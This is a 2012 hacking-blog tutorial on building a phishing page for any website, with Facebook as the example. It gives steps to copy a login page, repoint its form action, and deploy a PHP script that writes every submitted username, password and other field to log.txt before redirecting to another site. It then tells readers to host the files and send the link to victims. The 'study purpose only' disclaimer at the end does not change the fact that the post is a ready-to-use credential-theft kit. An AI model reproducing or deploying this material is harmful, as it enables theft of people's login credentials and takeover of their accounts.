:: DARKJIWA.BLOGSPOT.COM ::
The Tormented Kingdom Of Webnet

WE ARE MALAYSIAN HACKERS.NOTHING IS SECURE WHEN WE TOGETHER.
[+] Post Title :

make phishing page For Any Website & How to Hack Accounts ?


[+] Date : 28 February 2012
[+] Author : darkjiwa
[+] Link : https://darkjiwa.blogspot.com/2012/02/make-phishing-page-for-any-website-how.html
[+] Type :



1. First Open the website of which you want to make phisher/ fake login page


Eg : Facebook.com


2. Now do right click and save the page.
3. Open the page in notepad, Now search for "action = http://" and change following address to login.php












4. After editing save the page as "index.html"

5. Now its time to create login.php . Open notepad and copy/paste this below code and save it as login.php :



header ('Location: http://yahoo.com');

$handle = fopen("log.txt", "a");

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>



6. Now create a simple and empty text file in notepad and save it as log.txt

7. Now create your own free web hosting account at my3gb.com and upload all the three files.

8. Upload Index.html , login.php , log.txt we created in above steps...

9. We are done, our phisher / fake login page is ready.



How to Hack Accounts ?



Send the index.html (the uploaded one my3gb.com ) link to the victim , once he/she will enter the information and do login with our fake login page then every thing will be stored in log.txt, we can now open log.txt to see all the Login details



Its very simple to create phisher of any website in the world, Here i have taken the example of Facebook Phisher . But in this same you can also create the phisher of many websites like yahoo, gmail, orkut, msn, paypal etc



Note : This tutorial is for study purpose only. I want to make you aware how phishing is done . Please don't misuse this Knowledge. Don't "Hack Accounts" , its illegal. I am not responsible for any hack done by you..

0 comments:

Post a Comment